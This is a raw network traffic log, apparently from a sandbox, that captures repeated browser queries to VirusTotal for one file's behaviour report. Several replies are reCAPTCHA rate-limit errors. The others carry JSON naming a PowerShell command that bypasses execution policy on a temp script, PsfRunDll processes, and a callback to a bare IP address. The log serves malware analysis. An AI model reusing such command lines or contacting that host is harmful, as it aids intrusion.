                                                                                                                                                                                                                    Data Ascii: 3f72-44a7-89c5-5595fe6b30ee}\\ShellFolder\\RestrictedAttributes", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\Instance\\InitPropertyBag\\Attributes", "HKEY_LOCAL_MACHINE\\S


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    247192.168.2.165000674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:21 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:21 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 4b10ae554ffcd16d81953d302f23fcc4
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:21 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:21 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    248192.168.2.165000874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:24 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTAyNDg5MjAxNTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTgzLjQ1Mg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 601316a3aa0502e7eb99c2967d51b0f8
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:25 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:25 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 57 69 6e 64 6f 77 73 5c 5c 73 79 73 6e 61 74 69 76 65 5c 5c 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 5c 5c 76 31 2e 30 5c 5c 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 5c 22 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 62 79 70 61 73 73 20 2d 46 69 6c 65 20 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 79 79 79 6b 4f 72 6c 42 69 56 4e 64 54 66 50 47 51 57 53 4f 2e 70 73 31 5c 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 68 69 6c 64 72 65 6e 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy bypass -File \"C:\\Users\\<USER>\\AppData\\Local\\Temp\\yyykOrlBiVNdTfPGQWSO.ps1\"", "children": [ {
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC546INData Raw: 65 6c 66 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 74 79 70 65 3d 63 72 61 73 68 70 61 64 2d 68 61 6e 64 6c 65 72 20 5c 22 2d 2d 64 61 74 61 62 61 73 65 3d 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 55 73 65 72 20 44 61 74 61 5c 5c 43 72 61 73 68 70 61 64 5c 22 20 2d 2d 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 32 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 72 2f 72 65 70 6f 72 74 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 63 68 61 6e 6e 65 6c 3d 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 6c 61 74 3d 57 69 6e 36 34 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 70 72 6f 64 3d 43 68 72 6f 6d 65 20 2d 2d 61 6e 6e 6f 74 61 74 69 6f 6e 3d 76 65 72
                                                                                                                                                                                                                    Data Ascii: elf-annotation=ptype=crashpad-handler \"--database=C:\\Users\\<USER>\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 5c 5c 47 6f 6f 67 6c 65 5c 5c 43 68 72 6f 6d 65 5c 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 5c 63 68 72 6f 6d 65 2e 65 78 65 5c 22 20 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 6e 65 74 77 6f 72 6b 2e 6d 6f 6a 6f 6d 2e 4e 65 74 77 6f 72 6b 53 65 72 76 69 63 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 32 30 34 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65
                                                                                                                                                                                                                    Data Ascii: "name": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2044 --field-trial-handle
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 34 30 39 2d 31 38 30 30 34 36 2e 31 38 33 30 30 30 20 2f 70 72 65 66 65 74 63 68 3a 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 37 37 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c
                                                                                                                                                                                                                    Data Ascii: --variations-seed-version=20240409-180046.183000 /prefetch:8" }, { "process_id": "776", "name": "\"C:\\
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1280INData Raw: 2d 2d 74 79 70 65 3d 75 74 69 6c 69 74 79 20 2d 2d 75 74 69 6c 69 74 79 2d 73 75 62 2d 74 79 70 65 3d 71 75 61 72 61 6e 74 69 6e 65 2e 6d 6f 6a 6f 6d 2e 51 75 61 72 61 6e 74 69 6e 65 20 2d 2d 6c 61 6e 67 3d 65 6e 2d 55 53 20 2d 2d 73 65 72 76 69 63 65 2d 73 61 6e 64 62 6f 78 2d 74 79 70 65 3d 6e 6f 6e 65 20 2d 2d 6e 6f 2d 61 70 70 63 6f 6d 70 61 74 2d 63 6c 65 61 72 20 2d 2d 6d 6f 6a 6f 2d 70 6c 61 74 66 6f 72 6d 2d 63 68 61 6e 6e 65 6c 2d 68 61 6e 64 6c 65 3d 35 33 30 34 20 2d 2d 66 69 65 6c 64 2d 74 72 69 61 6c 2d 68 61 6e 64 6c 65 3d 31 39 32 30 2c 69 2c 38 32 34 39 31 33 34 39 39 36 32 33 34 32 35 35 30 35 39 2c 37 39 38 34 32 32 37 34 38 39 30 31 38 34 35 39 33 34 36 2c 32 36 32 31 34 34 20 2d 2d 76 61 72 69 61 74 69 6f 6e 73 2d 73 65 65 64 2d 76 65
                                                                                                                                                                                                                    Data Ascii: --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5304 --field-trial-handle=1920,i,8249134996234255059,7984227489018459346,262144 --variations-seed-ve
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 63 61 6c 5c 5c 54 65 6d 70 5c 5c 50 73 66 52 75 6e 44 6c 6c 33 32 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 34 36 33 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 5c 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 3c 55 53 45 52 3e 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 50 73 66 52 75 6e 44 6c 6c 36 34 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: cal\\Temp\\PsfRunDll32.exe\"" }, { "process_id": "4632", "name": "\"C:\\Users\\<USER>\\AppData\\Local\\Temp\\PsfRunDll64.exe\"" },
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 35 32 39 36 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 53 79 73 74 65 6d 33 32 5c 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 6e 65 74 73 76 63 73 20 2d 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "process_id": "5296", "name": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p" }, {
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 63 65 73 73 5f 69 64 22 3a 20 22 33 38 36 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 73 79 73 74 65 6d 33 32 5c 5c 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65 2e 65 78 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "process_id": "3860", "name": "C:\\Windows\\system32\\SecurityHealthService.exe" } ] },
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC1408INData Raw: 52 75 6e 44 6c 6c 36 34 2e 65 78 65 5c 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6e 61 6c 79 73 69 73 5f 64 61 74 65 22 3a 20 31 37 31 34 30 30 32 35 34 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 74 74 70 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 3a 2f 2f 35 2e 38 2e 36 33 2e 31 34 30 3a 34 34 33 2f 66 61 6b 65 75 72 6c 2e 68 74 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: RunDll64.exe\"" } ], "analysis_date": 1714002541, "http_conversations": [ { "url": "http://5.8.63.140:443/fakeurl.htm",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    249192.168.2.165000974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:25 UTC562OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:26 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1f9a5a7d107e71ad71467ac9830a56ff
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:26 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:26 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    250192.168.2.165001074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:56:29 UTC955OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTA1MzI5NTc4NjItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTg4LjQ0NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 213eb39bb8c57bf42f973134e4f181c6
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159972
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:30 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:30 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 5f 43 41 50 45 20 53 61 6e 64 62 6f 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 5f 62 65 68 61 76 69 6f 75 72
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox", "type": "file_behaviour", "links": { "self": "https://www.virustotal.com/ui/file_behaviour
